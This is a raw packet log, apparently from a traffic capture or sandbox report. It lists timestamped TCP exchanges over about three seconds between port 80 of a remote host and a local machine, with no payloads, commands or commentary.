                  Jul 5, 2024 07:26:40.805527925 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948401928 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948440075 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948456049 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948484898 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.948508978 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.948525906 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948683977 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948693991 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948709965 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948725939 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.948928118 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.948982000 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.949009895 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949018955 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949049950 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.949130058 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949140072 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949150085 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949168921 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.949297905 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949314117 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949340105 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.949821949 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949877024 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.949892044 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949903011 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.949940920 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:40.950005054 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.950015068 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:40.950057030 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.027836084 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.027919054 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.027990103 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.028098106 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.028172970 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.028183937 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.028218031 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.028273106 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.028284073 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.028325081 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.107825994 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.107851028 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.107860088 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.107909918 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.107913017 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.266777992 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.266825914 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.266952991 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.266963959 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.266993999 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.266999960 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.267009974 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267020941 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267031908 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267054081 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.267066002 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.267195940 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267261982 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267272949 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.267307997 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.267366886 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.425884962 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.425925970 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.425941944 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.425954103 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.425991058 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.425992012 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.426104069 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426115036 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426142931 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.426209927 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426219940 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426229954 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426249027 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.426614046 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.426651955 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.426697969 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505462885 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505481005 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505518913 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.505544901 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505559921 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505604982 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.505626917 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505698919 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505707979 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.505747080 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.585184097 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585243940 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585256100 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585293055 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.585366011 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585376024 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585392952 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.585414886 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.664895058 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.664938927 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.664962053 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.664973021 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.665004015 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.665008068 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.665069103 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.665108919 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.665142059 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.665153027 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.665188074 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.665219069 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.680598974 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.680639029 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.744575977 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744879007 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744889021 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744901896 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744911909 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744920015 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.744923115 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744939089 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.744940996 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.744972944 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.760571003 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824084997 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824151039 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824162006 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824256897 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.824256897 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.824280977 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824292898 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824331999 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.824333906 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824434996 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824446917 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824474096 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.824541092 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.824588060 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.903739929 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903783083 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903793097 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903867006 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903925896 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903933048 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.903937101 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.903970003 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.904100895 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.904113054 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.904148102 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.904407978 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.904417992 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.904453039 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.983450890 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983500004 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983510971 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983586073 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.983608961 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983661890 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.983688116 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983736992 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983747959 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983786106 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:41.983927011 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983939886 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:41.983978987 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144176960 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144215107 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144229889 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144355059 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144366026 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144392014 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144397974 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144404888 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144442081 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144527912 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144540071 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144548893 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144567966 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144646883 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144666910 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144691944 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144772053 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144783974 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144821882 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144920111 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144929886 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144939899 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144951105 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.144963980 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.144984961 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.145095110 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222193003 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222203016 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222213030 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222223997 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222235918 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222237110 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.222249985 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.222253084 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.222289085 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.302561045 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302642107 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302654028 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302735090 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.302755117 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302772999 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302815914 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.302839994 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302850962 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302860022 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.302885056 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.317574024 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.317625999 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.380919933 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.380929947 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.380958080 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.380970001 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.380980015 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.380986929 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.380991936 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.381005049 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.381027937 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.381243944 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.381350040 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.381396055 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.398044109 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460606098 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460654974 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.460870028 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460880995 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460894108 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460905075 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460916042 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.460916996 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460928917 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460942984 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.460951090 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460962057 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.460963964 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.461003065 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.541409016 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541482925 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541495085 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541529894 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.541637897 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541649103 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541659117 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541668892 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541685104 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.541697979 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.541758060 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541881084 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541891098 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.541927099 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.619887114 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.619927883 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.619966030 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.619982958 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.620024920 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620035887 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620071888 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.620170116 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620181084 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620191097 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620213032 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.620635033 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620676994 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.620727062 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620739937 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.620779991 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.699700117 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699709892 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699722052 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699775934 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.699831009 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699845076 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699855089 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699867964 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.699882030 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.699911118 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.700006008 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.700084925 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.700095892 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.700128078 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.700135946 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.700185061 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.781975031 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782051086 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782062054 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782102108 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.782217026 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782227993 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782238007 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782248020 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782258034 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.782290936 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.782380104 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782428980 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782439947 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.782473087 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.782545090 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938569069 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938594103 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938605070 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938625097 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.938653946 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.938672066 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938719988 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938791037 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938801050 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938837051 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.938853979 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.938932896 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938942909 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938954115 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938963890 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.938988924 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.938999891 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.939135075 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.939757109 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.939768076 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.939802885 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:42.939867973 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.939877987 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:42.939918041 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.017565966 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017585039 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017642975 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.017649889 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017705917 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017716885 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017739058 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.017834902 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017846107 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.017891884 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.097196102 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097235918 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097244978 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097281933 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.097321987 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097399950 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097410917 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097423077 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097434044 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.097445965 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.097475052 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.112992048 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.176956892 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.176966906 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.176985979 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.176997900 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.177006960 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.177012920 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.177018881 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.177036047 CEST804917391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:43.177037001 CEST4917380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:43.177052021 CEST4917380192.168.2.2291.92.254.194
